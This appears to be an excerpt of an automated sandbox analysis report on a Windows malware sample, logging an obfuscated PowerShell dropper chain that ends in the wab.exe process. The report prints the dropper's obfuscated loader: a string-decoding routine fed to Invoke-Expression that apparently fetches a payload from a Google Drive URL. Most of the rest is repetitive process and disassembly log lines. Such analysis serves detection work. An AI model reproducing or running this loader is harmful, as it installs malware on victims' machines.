';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD343D00BD pushad ; iretd 2_2_00007FFD343D00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344A71C8 push esp; retf 2_2_00007FFD344A71C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07A10638 push eax; mov dword ptr [esp], ecx5_2_07A10AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_086E3A9C push ebx; retf 5_2_086E3ADA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_086E2B31 push ebx; ret 5_2_086E2B32
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F4B09 push ebx; retf 5_2_092F4B11
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F1D7A push eax; iretd 5_2_092F1D81
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F11A4 push eax; iretd 5_2_092F11A5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F27EF push eax; iretd 5_2_092F27F5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F2BD2 push eax; retf 5_2_092F2BD5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F3438 push es; retf 5_2_092F3439
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F100F push ebp; retf 5_2_092F1015
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F4A10 push esp; ret 5_2_092F4AA1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F386F push ebp; retf 5_2_092F3871
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F4A64 push esp; ret 5_2_092F4AA1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F0660 push 7677562Fh; retf 5_2_092F0671
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_092F06BC pushfd ; retf 5_2_092F06ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_027C0CB5 push edi; ret 11_2_027C0CC2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C62BD2 push eax; retf 11_2_03C62BD5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C64B09 push ebx; retf 11_2_03C64B11
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C64A64 push esp; ret 11_2_03C64AA1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C64A10 push esp; ret 11_2_03C64AA1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C611A4 push eax; iretd 11_2_03C611A5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C6386F push ebp; retf 11_2_03C63871
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C6100F push ebp; retf 11_2_03C61015
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C627EF push eax; iretd 11_2_03C627F5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C606BC pushfd ; retf 11_2_03C606ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C60660 push 7677562Fh; retf 11_2_03C60671
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C61D7A push eax; iretd 11_2_03C61D81
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_03C63438 push es; retf 11_2_03C63439
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CAE8DB push ss; ret 11_2_24CAE8DE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
